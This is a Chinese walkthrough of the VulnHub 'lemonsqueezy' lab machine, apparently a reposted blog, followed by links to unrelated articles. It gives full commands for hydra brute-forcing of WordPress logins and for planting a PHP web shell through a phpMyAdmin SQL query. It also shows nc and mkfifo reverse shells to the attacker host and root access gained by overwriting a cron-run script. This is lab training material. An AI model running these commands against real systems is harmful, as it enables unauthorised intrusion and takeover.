vulnhub（15）：lemonsqueezy（hydra爆破、计划任务提权）

🕗 发布于 2024-10-16 15:00 网络安全 安全 linux python

端口

nmap -Pn -p- 192.168.72.173

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:B8:2D:FC (VMware)

打点

80端口

主页面是apache2的默认页面，没有robots.txt，我们直接扫描目录

gobuster dir -u http://192.168.72.173/ -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html --add-slash 

/manual/              (Status: 200) [Size: 626]
/wordpress/           (Status: 200) [Size: 52276]
/javascript/          (Status: 403) [Size: 279]
/phpmyadmin/          (Status: 200) [Size: 10531]

发现wordpress之后，查看wordpress主页

主页翻了翻，没有什么敏感信息，尝试hydra爆破

hydra爆破

burp抓包保存请求头到raj文件中，raj文件如下

Host: lemonsqueezy
User-Agent: Mozilla/5.0 (Hydra Proxy)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://lemonsqueezy/wordpress/wp-login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://lemonsqueezy
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

写python脚本，将数据包中的信息转成hydra命令

file_array = []

file = input(str())

with open(file,"r") as f:
    for line in f:
        file_array.append(":H=" + line.strip().replace(":","\\:"))

header=""

for line in file_array:
    header += line
    print(line)
print(header)

结果

:H=Host\: lemonsqueezy:H=User-Agent\: Mozilla/5.0 (Hydra Proxy):H=Accept\: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding\: gzip, deflate:H=Referer\: http\://lemonsqueezy/wordpress/wp-login.php:H=Content-Type\: application/x-www-form-urlencoded:H=Content-Length\: 109:H=Origin\: http\://lemonsqueezy:H=Connection\: close:H=Cookie\: wordpress_test_cookie=WP+Cookie+check:H=Upgrade-Insecure-Requests\: 1

hydra爆破用户名

hydra -L /usr/share/wordlists/SecLists-master/Usernames/top-usernames-shortlist.txt -p 123 lemonsqueezy http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Flemonsqueezy%2Fwordpress%2Fwp-admin%2F&testcookie=1:H=Host\: lemonsqueezy:H=User-Agent\: Mozilla/5.0 (Hydra Proxy):H=Accept\: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding\: gzip, deflate
:H=Referer\: http\://lemonsqueezy/wordpress/wp-login.php:H=Content-Type\: application/x-www-form-urlencoded:H=Content-Length\: 109
:H=Origin\: http\://lemonsqueezy:H=Connection\: close:H=Cookie\: wordpress_test_cookie=WP+Cookie+check:H=Upgrade-Insecure-Requests\: 1:Invalid"

结果爆破出两个用户，保存到usernames.txt文件：
lemon
orange

hydra爆破密码

hydra -L usernames.txt -P /usr/share/wordlists/SecLists-master/Passwords/500-worst-passwords.txt lemonsqueezy http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Flemonsqueezy%2Fwordpress%2Fwp-admin%2F&testcookie=1:H=Host\: lemonsqueezy:H=User-Agent\: Mozilla/5.0 (Hydra Proxy):H=Accept\: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding\: gzip, deflate
:H=Referer\: http\://lemonsqueezy/wordpress/wp-login.php:H=Content-Type\: application/x-www-form-urlencoded:H=Content-Length\: 109
:H=Origin\: http\://lemonsqueezy:H=Connection\: close:H=Cookie\: wordpress_test_cookie=WP+Cookie+check:H=Upgrade-Insecure-Requests\: 1:incorrect"

爆破出密码：
[80][http-post-form] host: lemonsqueezy   login: orange   password: ginger

登陆后台

看到一个敏感信息，在以Keep this safe!为标题的post下的内容如下

n0t1n@w0rdl1st!

登录phpmyadmin

orange
n0t1n@w0rdl1st!

sql语句上传木马

select "<?php system($_GET['a'])?>" into outfile "/var/www/html/wordpress/1.php"

反弹shell

http://lemonsqueezy/wordpress/1.php?a=nc 192.168.72.162 1234 -e /bin/bash

提权

crontab

运行了如下脚本
*/2 *   * * *   root    /etc/logrotate.d/logrotate

此外这个脚本是777权限

反弹shell覆盖此文件

echo "mkfifo /tmp/f; nc 192.168.72.162 223 </tmp/f | bash > /tmp/f 2>&1;rm -rf /tmp/f" > /etc/logrotate.d/logrotate

攻击主机监听：
nc -nvlp 223

root

[listening on [any] 223 ...
connect to [192.168.72.162] from (UNKNOWN) [192.168.72.173] 59534
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
cd /root
ls
root.txt
cat root.txt
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=]()

原文地址：https://blog.csdn.net/anddddoooo/article/details/142942173

免责声明：本站文章内容转载自网络资源，如本站内容侵犯了原著者的合法权益，可联系本站删除。更多内容请关注自学内容网（zxcms.com）！

上一篇：2024年中国工业大模型行业发展研究报告｜附43页PDF文件下载
下一篇：什么是世界币？

SafeLine - 雷池 - 不让黑客越过半步
SafeLine，中文名 "雷池"，是一款简单好用, 效果突出的 **`Web 应用防火墙(WAF)`**，可以保护 Web 服务不受黑客攻击。
阅读更多2024-10-16
JL-31 管式墒情记录仪一体式水分测量仪土壤墒情监测仪
管式墒情记录仪能够针对不同土层的土壤水分含量进行动态观测，可以同时检测记录土壤温度和水壤水分的变化，采用分层设点的观测结构，地面配置一个温度观测点，地下土壤每隔10cm配置一个土壤温湿测点，观测相对应
阅读更多2024-10-16
LlamaIndex实现 JSON结构化输出的反射工作流程
本笔记本将介绍如何设置一个LlamaIndex的工作流，从用户的提问中，提取结构化对象的关键信息，以便通过重试和对错误进行反思来提供可靠的JSON结构化文本输出的。这在用户希望LLM能按照用户意愿生
阅读更多2024-10-16
Vue3创建
Vue3创建
阅读更多2024-10-16
大学新生编程入门指南：如何选择编程语言与制定学习计划
编程的学习之路虽然充满挑战，但只要你坚持不懈，并合理规划自己的学习过程，一定能够取得显著的进步。无论你选择的是 Python 编程、JavaScript 编程，还是 C/C++ 编程，关键在于持续的练
阅读更多2024-10-16
小猿口算辅助工具（nodejs版）
实现原理：通过屏幕截图截取到题目区域的两个数字，然后通过 ocr 识别出数字，最后通过计算得出答案，并通过模拟鼠标绘制答案。
阅读更多2024-10-16
C语言_指针_进阶
通过本章内容，对于指针的理解将会得到一个极大的提升，从此指针将不再是难点，而是我们对于底层访问的一把利器
阅读更多2024-10-16
SpringBoot3 + MyBatisPlus 快速整合
这样我们完成了基本的整合，已经可以满足我们前期的开发工作。至于一些高级功能，比如多数据源支持，数据权限插件，等等。等我们需要的时候，可以自己查阅官方文档进行添加，官方文档写的很详细。
阅读更多2024-10-16
优化UVM环境（四）-comp+run生成的文件比较乱，分类整理
优化UVM环境（四）-comp+run生成的文件比较乱，分类整理
阅读更多2024-10-16
C# WinForms 中嵌入 EXE 程序
在 C# WinForms 应用程序中，有时我们希望嵌入并控制其他 EXE 程序。这可以通过 Windows 提供的 API 来实现。本文将介绍如何在 WinForms 应用程序中嵌入并控制外部 EX
阅读更多2024-10-16